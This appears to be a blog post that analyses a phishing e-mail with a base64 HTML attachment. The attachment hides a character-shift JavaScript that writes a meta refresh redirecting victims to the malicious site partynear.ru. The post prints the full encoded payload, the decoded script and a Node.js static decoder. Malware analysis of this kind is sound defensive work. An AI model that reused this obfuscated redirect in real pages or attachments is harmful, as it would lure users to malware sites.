Tuesday, September 21, 2010

HTML virus inspired by a toy decoder ring

Here's a junior-level virus attempt that's inspired by the cereal-box decoder ring.
It's much easier to understand than most, and actually kinda fun to go through.

Subject: Please sign and send back to me asap

PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPg0KPCEtLQ0KdmFyIHM9Ij1uZnViIWl1dXEu
ZnJ2anc+I3NmZ3NmdGkjIWRwb3Vmb3U+IzE8dnNtPml1dXE7MDBxYnN1em9mYnMvc3YjITA/IjsN
Cm09IiI7IGZvciAoaT0wOyBpPHMubGVuZ3RoOyBpKyspIHsJaWYocy5jaGFyQ29kZUF0KGkpID09
IDI4KXsJICBtKz0gJyYnO30gZWxzZSBpZiAocy5jaGFyQ29kZUF0KGkpID09IDIzKSB7CSAgbSs9
ICchJzt9IGVsc2UgewkgIG0rPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KGkpLTEp
Owl9fWRvY3VtZW50LndyaXRlKG0pOy8vLS0+DQo8L3NjcmlwdD4NCg==

------=_Part_5860_20528071.5734153553633
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Forgot the Attachment - Here ya go!

------=_Part_5860_20528071.5734153553633
Content-Type: text/html; name="85104attach.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="85104attach.html"

After decoding the base64 attachment we have (the opening tags are defanged so nothing executes, and the s string is restored in full from the base64 above):

[less than symbol] script type='text/javascript'>
var s = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00qbsuzofbs/sv#!0?";
m = "";
for (i = 0; i < s.length; i++) {
    if (s.charCodeAt(i) == 28) { m += '&'; }        // control character 28 -> ampersand
    else if (s.charCodeAt(i) == 23) { m += '!'; }   // control character 23 -> exclamation mark
    else { m += String.fromCharCode(s.charCodeAt(i) - 1); }  // every other character shifts down one code point
}
document.write(m);
[less than symbol] /script>


s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00qbsuzofbs/sv#!0?";
m starts out empty
iterate over the length of s, with i as the counter

This is the important part:
m += String.fromCharCode(s.charCodeAt(i) - 1);

Pretty basic: shift each character to the one before it in the ASCII table,
so n becomes m, f becomes e.
Looking at
http://www.cdrummond.qc.ca/cegep/informat/Professeurs/Alain/files/ascii.htm
shows the order of the punctuation (! becomes space, # becomes ", etc).
The first character = becomes a less than symbol, but I removed it to keep things from executing.

nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00qbsuzofbs/sv#!0?
meta http-equiv="refresh" content="0;url=http://partynear.ru" />

The rest is just small stuff to get the script to work. Actually I think the & is put in the wrong place.

m += '&' when s.charCodeAt(i) == 28 (ASCII control character 28, which is not printable)
m += '!' when s.charCodeAt(i) == 23 (ASCII control character 23)
Neither of those codes occurs anywhere in s, which is all printable characters, so in this sample both branches are dead and every character goes through the minus-one shift.

document.write(m) hands the decoded string to the browser, which parses it as HTML. The "refresh" is what makes it all happen: with content="0" the meta tag redirects the page to partynear.ru immediately, before the victim sees anything.
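To check the hand decode above end to end, here is an added example (my own code, not part of the original post or the attachment) that runs under Node.js offline: it base64-decodes the attachment body quoted above, pulls the s string out with a regular expression instead of executing the script, applies the same three decoding rules, and then reads the refresh target out of the resulting meta tag and defangs it for a report. The helper names (decodeAttachment, extractPayload, decodeRing, extractRefreshUrl, defang, analyze) are my own choices.

```javascript
// Added example, not from the original post: static decoder for the
// 85104attach.html attachment, re-implementing the attacker's transform
// without document.write so the result can be inspected, not executed.

// Base64 body of the attachment, copied from the e-mail quoted in the post.
const ATTACHMENT_B64 =
  "PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPg0KPCEtLQ0KdmFyIHM9Ij1uZnViIWl1dXEu" +
  "ZnJ2anc+I3NmZ3NmdGkjIWRwb3Vmb3U+IzE8dnNtPml1dXE7MDBxYnN1em9mYnMvc3YjITA/IjsN" +
  "Cm09IiI7IGZvciAoaT0wOyBpPHMubGVuZ3RoOyBpKyspIHsJaWYocy5jaGFyQ29kZUF0KGkpID09" +
  "IDI4KXsJICBtKz0gJyYnO30gZWxzZSBpZiAocy5jaGFyQ29kZUF0KGkpID09IDIzKSB7CSAgbSs9" +
  "ICchJzt9IGVsc2UgewkgIG0rPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KGkpLTEp" +
  "Owl9fWRvY3VtZW50LndyaXRlKG0pOy8vLS0+DQo8L3NjcmlwdD4NCg==";

// Step 1: undo the MIME transfer encoding to get the HTML file as text.
function decodeAttachment(b64) {
  return Buffer.from(b64, "base64").toString("latin1");
}

// Step 2: lift the obfuscated payload out of `var s="...";` by pattern
// matching, so the script itself never runs.
function extractPayload(html) {
  const m = /var\s+s\s*=\s*"([^"]*)"/.exec(html);
  if (!m) throw new Error("no `var s` string found in attachment");
  return m[1];
}

// Step 3: the decoder ring, same rules as the script: code 28 -> '&',
// code 23 -> '!', everything else shifted down by one code point.
function decodeRing(s) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    if (c === 28) out += "&";
    else if (c === 23) out += "!";
    else out += String.fromCharCode(c - 1);
  }
  return out;
}

// Step 4: for triage, read the refresh target out of the decoded meta tag
// (content="<seconds>;url=<target>") and return null if there is none.
function extractRefreshUrl(html) {
  const m = /content\s*=\s*"\s*\d+\s*;\s*url\s*=\s*([^"]+)"/i.exec(html);
  return m ? m[1].trim() : null;
}

// Defang the URL so it can be pasted into a report without being clickable.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

// Run the whole pipeline and return every intermediate value.
function analyze(b64) {
  const html = decodeAttachment(b64);
  const payload = extractPayload(html);
  const decoded = decodeRing(payload);
  const url = extractRefreshUrl(decoded);
  return { payload, decoded, url, defanged: url ? defang(url) : null };
}

const report = analyze(ATTACHMENT_B64);
console.log("payload :", report.payload);
console.log("decoded :", report.decoded);
console.log("redirect:", report.defanged);
```

The decoded value comes out as the meta refresh tag shown above, and the redirect is reported as hxxp://partynear[.]ru. Feeding decodeRing a string containing bytes 28 and 23 exercises the two special-case branches that this particular sample never triggers.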

So what is at partynear.ru?
Not much according to the text-only browser Lynx. It says "Unexpected network read error".
jsunpack shows that there appears to be a redirect sending you further into the site, into a Themes/card.js area that is trying to run another JavaScript. It's not clear if this is smoke or malware or something else.
